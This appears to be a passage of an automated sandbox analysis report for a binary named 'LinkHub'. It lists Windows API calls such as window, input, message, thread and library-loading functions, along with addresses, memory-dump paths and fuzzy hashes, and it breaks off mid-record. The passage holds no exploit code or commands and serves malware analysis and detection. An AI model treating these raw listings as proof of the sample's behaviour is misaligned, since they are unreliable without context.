                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 6f2960791fa510956f9d111953780ac538b37b6623934aeba13a3f7be7329052
                                                                    • Instruction ID: 3ca04f244dd1b96fd9a13eb495af024ee56e72880569b47b72d5ebe13e9b4e7e
                                                                    • Opcode Fuzzy Hash: 6f2960791fa510956f9d111953780ac538b37b6623934aeba13a3f7be7329052
                                                                    • Instruction Fuzzy Hash: 5E310B30D606495FFF268F6498057FABBAEFF86710F04422AE481561D2CB748D65CB91
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 002D80D4
                                                                    • GetWindowRect.USER32(?,?), ref: 002D814A
                                                                    • PtInRect.USER32(?,?,?), ref: 002D815A
                                                                    • MessageBeep.USER32(00000000), ref: 002D81C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: 504db3e23f5c9826357210dfafba84ad766b6b214efbb4fd742ee5c840713b9e
                                                                    • Instruction ID: 882d5fed323b3bd9c9ae7f6ee686f6a24cac76a4c71248a8cf6d10b3122f5212
                                                                    • Opcode Fuzzy Hash: 504db3e23f5c9826357210dfafba84ad766b6b214efbb4fd742ee5c840713b9e
                                                                    • Instruction Fuzzy Hash: DE41A230A11216DFCB12DF58D884AA9B7F5FF49314F1480A6E9589B361CB30EC6ACF80
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 002D2187
                                                                      • Part of subcall function 002A4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002A43AD
                                                                      • Part of subcall function 002A4393: GetCurrentThreadId.KERNEL32 ref: 002A43B4
                                                                      • Part of subcall function 002A4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002A2F00), ref: 002A43BB
                                                                    • GetCaretPos.USER32(?), ref: 002D219B
                                                                    • ClientToScreen.USER32(00000000,?), ref: 002D21E8
                                                                    • GetForegroundWindow.USER32 ref: 002D21EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 0b14ea376364aaf803ef16fa653d4b7abd7f921355137482b9b747a6009cd998
                                                                    • Instruction ID: 7364907c1728fb9013beeb205e1293bf1a2a25475b51adf97d2e58dac24aa817
                                                                    • Opcode Fuzzy Hash: 0b14ea376364aaf803ef16fa653d4b7abd7f921355137482b9b747a6009cd998
                                                                    • Instruction Fuzzy Hash: 28317071D10109AFDB04EFA9C8818AEB7FCEF58304B5180AAE415E7312DA71DE55CFA0
                                                                    APIs
                                                                      • Part of subcall function 002441EA: _wcslen.LIBCMT ref: 002441EF
                                                                    • _wcslen.LIBCMT ref: 002AE8E2
                                                                    • _wcslen.LIBCMT ref: 002AE8F9
                                                                    • _wcslen.LIBCMT ref: 002AE924
                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 002AE92F
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                    • String ID:
                                                                    • API String ID: 3763101759-0
                                                                    • Opcode ID: f18b8f6fd0035e78b53c9eebf497e2aba0359d136f2f3eae29066ec42ad27948
                                                                    • Instruction ID: 4085a3c78b6f4fd499053bb10aab1bff77e663c7bd4d708eb1f4b45da2cf1fd2
                                                                    • Opcode Fuzzy Hash: f18b8f6fd0035e78b53c9eebf497e2aba0359d136f2f3eae29066ec42ad27948
                                                                    • Instruction Fuzzy Hash: 0621B571D10319AFCF10AFA8D981BAEB7F8EF46350F154065E904BB281DA709E61CBA1
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(?,002DDC30), ref: 002ADBA6
                                                                    • GetLastError.KERNEL32 ref: 002ADBB5
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 002ADBC4
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002DDC30), ref: 002ADC21
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2267087916-0
                                                                    • Opcode ID: e83264080a9f3fb4a9d4e75ac3ea6badc27a6869d3f6259be70a2edb6f884cf2
                                                                    • Instruction ID: e7922893892e6967a820f226b2e6b5703a29414535262062b0d602f812d1c13b
                                                                    • Opcode Fuzzy Hash: e83264080a9f3fb4a9d4e75ac3ea6badc27a6869d3f6259be70a2edb6f884cf2
                                                                    • Instruction Fuzzy Hash: 5021B1705647018F8304DF24C88496ABBE8EE5B764F504A1AF49A832A2DB70DD56CF52
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002D32A6
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002D32C0
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002D32CE
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002D32DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: d6ac0a46d225a6637cbc9c029252f13e65d7a54cfa9f7256f36b7a53687e657f
                                                                    • Instruction ID: be41bfc98bc3545d3f3ca48a463da2b85200a01e6a7cb3a726ea16aae010d704
                                                                    • Opcode Fuzzy Hash: d6ac0a46d225a6637cbc9c029252f13e65d7a54cfa9f7256f36b7a53687e657f
                                                                    • Instruction Fuzzy Hash: 31214431A25511AFD704DF24CC08F6ABB98AF81324F24824AF8268B3D2C771ED41CBD1
                                                                    APIs
                                                                      • Part of subcall function 002A96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,002A8271,?,000000FF,?,002A90BB,00000000,?,0000001C,?,?), ref: 002A96F3
                                                                      • Part of subcall function 002A96E4: lstrcpyW.KERNEL32(00000000,?,?,002A8271,?,000000FF,?,002A90BB,00000000,?,0000001C,?,?,00000000), ref: 002A9719
                                                                      • Part of subcall function 002A96E4: lstrcmpiW.KERNEL32(00000000,?,002A8271,?,000000FF,?,002A90BB,00000000,?,0000001C,?,?), ref: 002A974A
                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,002A90BB,00000000,?,0000001C,?,?,00000000), ref: 002A828A
                                                                    • lstrcpyW.KERNEL32(00000000,?,?,002A90BB,00000000,?,0000001C,?,?,00000000), ref: 002A82B0
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,002A90BB,00000000,?,0000001C,?,?,00000000), ref: 002A82EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                    • String ID: cdecl
                                                                    • API String ID: 4031866154-3896280584
                                                                    • Opcode ID: c109e87a275ea2d78ebb7a61a28a0da7d9bbe13ff66b3557f5416214ee6027e9
                                                                    • Instruction ID: 937f4537d2f605c712a668347bc2ae7c26676fe2e5f0cc7e94d6d7a9ab2d952c
                                                                    • Opcode Fuzzy Hash: c109e87a275ea2d78ebb7a61a28a0da7d9bbe13ff66b3557f5416214ee6027e9
                                                                    • Instruction Fuzzy Hash: CE11263A210382AFCB149F38D844E7A77A9FF46750B10402AF906C7290EF31D861DB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 002D615A
                                                                    • _wcslen.LIBCMT ref: 002D616C
                                                                    • _wcslen.LIBCMT ref: 002D6177
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D62B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen
                                                                    • String ID:
                                                                    • API String ID: 455545452-0
                                                                    • Opcode ID: c01212b1676ff5b33af345eb789196dd0e644d0a4e70904ff77e7a4838522bd0
                                                                    • Instruction ID: ce489553deb2f2e9c0d358d255ec3b1ec94ce98ba4513bd435621e9ce1cce35c
                                                                    • Opcode Fuzzy Hash: c01212b1676ff5b33af345eb789196dd0e644d0a4e70904ff77e7a4838522bd0
                                                                    • Instruction Fuzzy Hash: F711D635930219AAEB10DFA49C88AEF777CEB15750F104127F915D5281E7B4CD64CB60
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 15275f7bd93e7e9a8258748a0ea4eb5f1facd0fee4e8d3fee4981d7c38dd358b
                                                                    • Instruction ID: a45a12364c06ae30da1dfcb483d04294e64f020d2d8ea66030e2247b2ead1351
                                                                    • Opcode Fuzzy Hash: 15275f7bd93e7e9a8258748a0ea4eb5f1facd0fee4e8d3fee4981d7c38dd358b
                                                                    • Instruction Fuzzy Hash: 0D018FB2639616FEE7212A787CC1F67670DDF613B8B308325F529A11D1DA708C688570
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002A2394
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A23A6
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A23BC
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A23D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 9b59214cf1f6128ed0f343f2bd17e353b2b443d98a410cf80f88996ff3746832
                                                                    • Instruction ID: f95a1e33ad9ada71b2303c5b6ee3d7c977698eefc574aa158db9fb4c1776b2b0
                                                                    • Opcode Fuzzy Hash: 9b59214cf1f6128ed0f343f2bd17e353b2b443d98a410cf80f88996ff3746832
                                                                    • Instruction Fuzzy Hash: A411F73A901219FFEF119BA9CD85F9DBBB8EB09750F200091EA01B7290DA716E54DB94
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 002AEB14
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 002AEB47
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002AEB5D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002AEB64
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: 1f34ed8e3f0015d9fc114d5ee5cd44f062f9b3df9f862fa49b33e6b44bdbd9a5
                                                                    • Instruction ID: 4f37a2324afc937ecc0fc29302a83287304a882bc91d648fa34ceab9c36b889a
                                                                    • Opcode Fuzzy Hash: 1f34ed8e3f0015d9fc114d5ee5cd44f062f9b3df9f862fa49b33e6b44bdbd9a5
                                                                    • Instruction Fuzzy Hash: D3110876D10259BBCF019FA8AC0EADB7FACEB46314F018656F825D3290D674CD1587B0
                                                                    APIs
                                                                    • CreateThread.KERNEL32(00000000,?,0026D369,00000000,00000004,00000000), ref: 0026D588
                                                                    • GetLastError.KERNEL32 ref: 0026D594
                                                                    • __dosmaperr.LIBCMT ref: 0026D59B
                                                                    • ResumeThread.KERNEL32(00000000), ref: 0026D5B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 173952441-0
                                                                    • Opcode ID: 92618079721e25ed59588d26a79d676bd79c8a45fd1f60e3192fd7f58871c99f
                                                                    • Instruction ID: af156dddeca8ed336234970d713a2053720be0350e5b67a65e8a6a98335fdc30
                                                                    • Opcode Fuzzy Hash: 92618079721e25ed59588d26a79d676bd79c8a45fd1f60e3192fd7f58871c99f
                                                                    • Instruction Fuzzy Hash: C801FE76E355187BCB106F65EC09BAA7B5CEF81334F100215F525861D0CF708CA4CAA1
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002478B1
                                                                    • GetStockObject.GDI32(00000011), ref: 002478C5
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 002478CF
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                    • String ID:
                                                                    • API String ID: 3970641297-0
                                                                    • Opcode ID: 69713e15e6b0a19c82a6c6f8ba44ea74977ca403ce39d7a0464b50567dc9f778
                                                                    • Instruction ID: 13d6ea04773c437fe80742ab1db085d4050c715ce16ed35209bd8f876f6debaf
                                                                    • Opcode Fuzzy Hash: 69713e15e6b0a19c82a6c6f8ba44ea74977ca403ce39d7a0464b50567dc9f778
                                                                    • Instruction Fuzzy Hash: 13118B72916509BFEF165F909C58EEABB69FF08364F040116FA1492120D7319C60EBA0
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002B11D9,00000000,00000000,?,0027338D,002B11D9,00000000,00000000,00000000,?,002735FE,00000006,FlsSetValue), ref: 00273418
                                                                    • GetLastError.KERNEL32(?,0027338D,002B11D9,00000000,00000000,00000000,?,002735FE,00000006,FlsSetValue,002E3260,FlsSetValue,00000000,00000364,?,002731B9), ref: 00273424
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0027338D,002B11D9,00000000,00000000,00000000,?,002735FE,00000006,FlsSetValue,002E3260,FlsSetValue,00000000), ref: 00273432
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 80612b7e4a7415a6de17e552d44f54bccc34ede3881fcf872bd74352759eb350
                                                                    • Instruction ID: 1bc436454468926852eb3aa13502417921b0bded2ef8896d8a32e030bb49b09e
                                                                    • Opcode Fuzzy Hash: 80612b7e4a7415a6de17e552d44f54bccc34ede3881fcf872bd74352759eb350
                                                                    • Instruction Fuzzy Hash: 1A01D433A72623ABCB26CF79AC589963B58BF04B617218220F90EE7181C730DD11D6E0
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002AB69A,?,00008000), ref: 002ABA8B
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002AB69A,?,00008000), ref: 002ABAB0
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002AB69A,?,00008000), ref: 002ABABA
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002AB69A,?,00008000), ref: 002ABAED
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    • Opcode ID: 108a3a0f652a3dd18d63e0dfba3c6a15f26f05c7d852c7b701c4aff4496b3468
                                                                    • Instruction ID: c01f93e0c26358a3456dc3774e7a8f34be3d91bc787d8791ecd13ae57635b85d
                                                                    • Opcode Fuzzy Hash: 108a3a0f652a3dd18d63e0dfba3c6a15f26f05c7d852c7b701c4aff4496b3468
                                                                    • Instruction Fuzzy Hash: 6F117C31C11929E7CF059FA4E9487EEBB78FF0A711F114086D941B2142CF708A60CBA5
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 002D888E
                                                                    • ScreenToClient.USER32(?,?), ref: 002D88A6
                                                                    • ScreenToClient.USER32(?,?), ref: 002D88CA
                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002D88E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: 6e22a01f3c09ffe0f1bfee39f23f96b0f8c22ca215d7ea4d0420ccfdb07199e5
                                                                    • Instruction ID: 696c3228e7ff62cdbf863a1e1720045af0d4e6cf9b59d49e5ec0ce01795735e8
                                                                    • Opcode Fuzzy Hash: 6e22a01f3c09ffe0f1bfee39f23f96b0f8c22ca215d7ea4d0420ccfdb07199e5
                                                                    • Instruction Fuzzy Hash: 161143B9D0120AAFDB41CF98D8849EEBBB9FB08310F504156E915E3610D735AA54DF90
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002A3712
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 002A3723
                                                                    • GetCurrentThreadId.KERNEL32 ref: 002A372A
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002A3731
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: cfd5dbdd449a47aa082560cffbea178e06eeb339515294006a43558130011654
